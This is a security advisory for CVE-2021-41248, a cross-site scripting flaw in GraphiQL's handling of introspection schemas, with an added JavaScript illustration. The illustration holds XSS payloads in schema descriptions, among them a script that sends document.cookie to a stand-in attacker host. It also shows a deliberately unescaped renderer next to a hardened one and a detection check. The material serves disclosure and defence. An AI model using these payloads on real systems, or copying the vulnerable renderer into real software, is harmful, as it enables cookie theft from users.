Advisory #60
Title: GraphiQL introspection schema template injection attack
CVE ID: CVE-2021-41248
Vendor: GraphQL Foundation
Affected product: GraphiQL
Affected versions: 0.5.0 - 1.4.6
Vulnerability type: CWE-79 (Cross-site Scripting)
Description: GraphiQL has a cross-site scripting vulnerability: when it loads the schema of an untrusted GraphQL server, a malicious schema returned by introspection can execute arbitrary JavaScript in the browser of the user viewing it.
Status: Fixed in 1.4.7
Recommendation: Update to 1.4.7 or above.
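The following is an added illustration of the bug class named in the Description above (server-controlled schema strings reaching the page as markup), not GraphiQL's own code or the actual vulnerable code path. The introspection result, the two renderers and the `findMarkupInIntrospection` check are all constructed for this example; the payloads are inert strings used only to show what a doc-explorer renderer receives.

```javascript
// Added example: XSS via a malicious introspection schema.
// NOT GraphiQL's code. Every name below is constructed for this illustration.

// Constructed introspection result as a hostile GraphQL server could return it.
// Only the members the renderers below read are included.
const maliciousIntrospection = {
  data: {
    __schema: {
      types: [
        {
          kind: 'OBJECT',
          name: 'Query',
          description: 'Root query type<img src=x onerror="alert(document.cookie)">',
          fields: [
            {
              name: 'me',
              description:
                'Current user<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
              type: { name: 'User' },
            },
          ],
        },
      ],
    },
  },
};

// Minimal HTML escaper, safe for text nodes and quoted attribute values.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable doc renderer: schema strings are interpolated into markup as-is,
// so a description becomes live HTML once the string hits innerHTML.
function renderTypeDocsVulnerable(type) {
  const fields = (type.fields || [])
    .map(f => `<li><b>${f.name}</b>: ${(f.type && f.type.name) || ''}` +
              `<p>${f.description || ''}</p></li>`)
    .join('');
  return `<h2>${type.name}</h2><p>${type.description || ''}</p><ul>${fields}</ul>`;
}

// Hardened renderer: every server-controlled string is escaped before it is
// placed in markup. Names are escaped too; nothing from introspection is trusted.
function renderTypeDocsSafe(type) {
  const fields = (type.fields || [])
    .map(f => `<li><b>${escapeHtml(f.name)}</b>: ` +
              `${escapeHtml((f.type && f.type.name) || '')}` +
              `<p>${escapeHtml(f.description || '')}</p></li>`)
    .join('');
  return `<h2>${escapeHtml(type.name)}</h2>` +
         `<p>${escapeHtml(type.description || '')}</p><ul>${fields}</ul>`;
}

// Detection check: report the paths of type and field names/descriptions
// in an introspection result that contain an HTML tag opener.
function findMarkupInIntrospection(introspection) {
  const tagOpener = /<\/?[a-zA-Z!]/; // "<tag", "</tag", "<!--"
  const hits = [];
  const check = (path, value) => {
    if (typeof value === 'string' && tagOpener.test(value)) hits.push(path);
  };
  for (const t of introspection.data.__schema.types) {
    check(`${t.name}.name`, t.name);
    check(`${t.name}.description`, t.description);
    for (const f of t.fields || []) {
      check(`${t.name}.${f.name}.name`, f.name);
      check(`${t.name}.${f.name}.description`, f.description);
    }
  }
  return hits;
}

function demo() {
  const queryType = maliciousIntrospection.data.__schema.types[0];
  console.log('vulnerable:', renderTypeDocsVulnerable(queryType));
  console.log('hardened:  ', renderTypeDocsSafe(queryType));
  console.log('suspicious:', findMarkupInIntrospection(maliciousIntrospection));
}

demo();
```

Run it with `node`: the vulnerable output carries the `<img onerror=...>` and `<script>` markup verbatim, the hardened output turns them into visible `&lt;img ...&gt;` text, and the check lists `Query.description` and `Query.me.description` as the places a hostile server planted markup. A renderer that builds the doc explorer from introspection data should treat every string in that result exactly like any other untrusted user input.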